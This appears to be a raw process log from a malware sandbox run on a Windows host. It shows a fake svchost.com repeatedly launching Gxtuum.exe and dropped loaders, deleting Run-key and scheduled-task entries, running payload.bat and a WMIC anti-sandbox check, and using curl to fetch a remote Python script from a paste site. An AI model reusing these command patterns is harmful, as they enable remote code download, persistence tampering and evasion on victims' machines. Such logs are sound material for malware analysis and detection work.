"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\2578412766.exe
C:\Users\Admin\AppData\Local\Temp\2578412766.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\BACKD0~1.EXE"
C:\Users\Admin\AppData\Local\Temp\Files\BACKD0~1.EXE
C:\Users\Admin\AppData\Local\Temp\Files\BACKD0~1.EXE
C:\Users\Admin\sysnldcvmr.exe
C:\Users\Admin\sysnldcvmr.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\1188%E~1.EXE"
C:\Users\Admin\AppData\Local\Temp\Files\1188%E~1.EXE
C:\Users\Admin\AppData\Local\Temp\Files\1188%E~1.EXE
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\513022960.exe
C:\Users\Admin\AppData\Local\Temp\513022960.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\System32\cmd.exe /c reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Windows Upgrade Manager /f
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\System32\cmd.exe /c schtasks /delete /f /tn Windows Upgrade Manager
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Windows\SysWOW64\reg.exe
reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Windows Upgrade Manager /f
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\SysWOW64\schtasks.exe
schtasks /delete /f /tn Windows Upgrade Manager
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\287511317.exe
C:\Users\Admin\AppData\Local\Temp\287511317.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\154057176.exe
C:\Users\Admin\AppData\Local\Temp\154057176.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\test11.exe"
C:\Users\Admin\AppData\Local\Temp\Files\test11.exe
C:\Users\Admin\AppData\Local\Temp\Files\test11.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\3546345.exe"
C:\Users\Admin\AppData\Local\Temp\Files\3546345.exe
C:\Users\Admin\AppData\Local\Temp\Files\3546345.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\loader.exe"
C:\Users\Admin\AppData\Local\Temp\Files\loader.exe
C:\Users\Admin\AppData\Local\Temp\Files\loader.exe
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c "payload.bat"
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic path Win32_PointingDevice get PNPDeviceID /value | find "PNPDeviceID"
C:\Windows\System32\Wbem\WMIC.exe
wmic path Win32_PointingDevice get PNPDeviceID /value
C:\Windows\system32\find.exe
find "PNPDeviceID"
C:\Windows\system32\curl.exe
curl -L -o python-installer.exe https://www.python.org/ftp/python/3.10.0/python-3.10.0rc2-amd64.exe --insecure --silent
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\520429473.exe
C:\Users\Admin\AppData\Local\Temp\520429473.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\ADAPTO~1.EXE"
C:\Users\Admin\AppData\Local\Temp\Files\ADAPTO~1.EXE
C:\Users\Admin\AppData\Local\Temp\Files\ADAPTO~1.EXE
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\jb4w5s2l.exe"
C:\Users\Admin\AppData\Local\Temp\Files\jb4w5s2l.exe
C:\Users\Admin\AppData\Local\Temp\Files\jb4w5s2l.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\Files\jb4w5s2l.exe
"C:\Users\Admin\AppData\Local\Temp\Files\jb4w5s2l.exe"
C:\Users\Admin\AppData\Local\Temp\Files\jb4w5s2l.exe
"C:\Users\Admin\AppData\Local\Temp\Files\jb4w5s2l.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\Files\jb4w5s2l.exe
"C:\Users\Admin\AppData\Local\Temp\Files\jb4w5s2l.exe"
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /k copy Emotions Emotions.cmd & Emotions.cmd & exit
C:\Windows\SysWOW64\cmd.exe
C:\Windows\System32\cmd.exe /k copy Emotions Emotions.cmd & Emotions.cmd & exit
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 3980 -ip 3980
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3980 -s 332
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\python-installer.exe
python-installer.exe /quiet /passive InstallAllUsers=0 PrependPath=1 Include_test=0 Include_pip=1 Include_doc=0
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\Temp\{BE268F89-70B6-4786-963D-0EEA19ACEECA}\.cr\python-installer.exe
"C:\Windows\Temp\{BE268F89-70B6-4786-963D-0EEA19ACEECA}\.cr\python-installer.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\python-installer.exe" -burn.filehandle.attached=572 -burn.filehandle.self=724 /quiet /passive InstallAllUsers=0 PrependPath=1 Include_test=0 Include_pip=1 Include_doc=0
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\Temp\{81C67498-E825-4269-82FF-6D3BF790CDD7}\.be\python-3.10.0rc2-amd64.exe
"C:\Windows\Temp\{81C67498-E825-4269-82FF-6D3BF790CDD7}\.be\python-3.10.0rc2-amd64.exe" -q -burn.elevated BurnPipe.{DD8DBF4A-4DF9-4D20-A26B-E7B742651D29} {5C8DA92E-CA20-43A2-9F21-ED3F3CF16F12} 3244
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\system32\srtasks.exe
C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:4
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\CONSOL~1.EXE"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\Files\CONSOL~1.EXE
C:\Users\Admin\AppData\Local\Temp\Files\CONSOL~1.EXE
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\system32\curl.exe
curl -o webpage.py -s https://rentry.co/sntwm349/raw --insecure
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
